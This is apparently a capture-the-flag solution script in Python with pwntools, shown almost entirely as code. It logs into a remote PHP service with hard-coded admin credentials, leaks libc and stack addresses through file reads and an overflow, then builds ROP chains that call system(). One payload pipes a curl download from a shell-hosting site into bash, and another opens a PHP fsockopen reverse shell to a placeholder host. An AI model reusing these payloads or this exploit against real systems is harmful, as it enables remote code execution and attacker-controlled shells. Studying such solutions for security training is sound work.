Rating:
```python
from pwn import *
import requests,re
url = "http://134.175.185.244"
libc = ELF("./libc.so")
session = requests.Session()
def login():
paramsPost = {"password":"goodlucktoyou","submit":"submit","username":"admin"}
session.post(url+"/index.php", data=paramsPost)
def send(payload):
paramsPost = {"submit":"submit","search":payload}
response = session.post(url+"/select.php", data=paramsPost)
return re.findall('\<\/form\>(.*?)\<br\>',response.content)[0]
def read(payload):
paramsPost = {"submit":"submit","search":payload}
response = session.post(url+"/select.php", data=paramsPost)
return response.content[1517+len(payload):-1]
login()
# leak libc and stack
libc.address = int('0x'+re.findall('(.*?)libc-2.28',read("/proc/self/maps"))[0][:12],16)
stack = u64(send('a'*0x64)[0x64:].ljust(8, b'\0'))
log.warn("stack: "+str(hex(stack)))
log.warn("libc: "+str(hex(libc.address)))
# gadget
pop_rdi = libc.address + 0x023a5f
pop4_ret = libc.address + 0x024568
def attack1():
payload = "a"*0x88
payload += p64(pop_rdi) + p64(stack+0xa0) + p64(libc.symbols['system'])
payload += "curl https://shell.now.sh/x.x.x.x:8888|bash\x00"
send(payload)
def attack2():
payload = "php -r '$sock=fsockopen(\"x.x.x.x\",8888);exec(\"bash -i <&3 >&3 2>&3\");'\x00".ljust(0x88)
payload += p64(pop_rdi)*10+p64(pop4_ret)+p64(0)*4
payload += p64(pop_rdi)+p64(stack)+p64(libc.symbols['system'])
send(payload)
attack2()
```
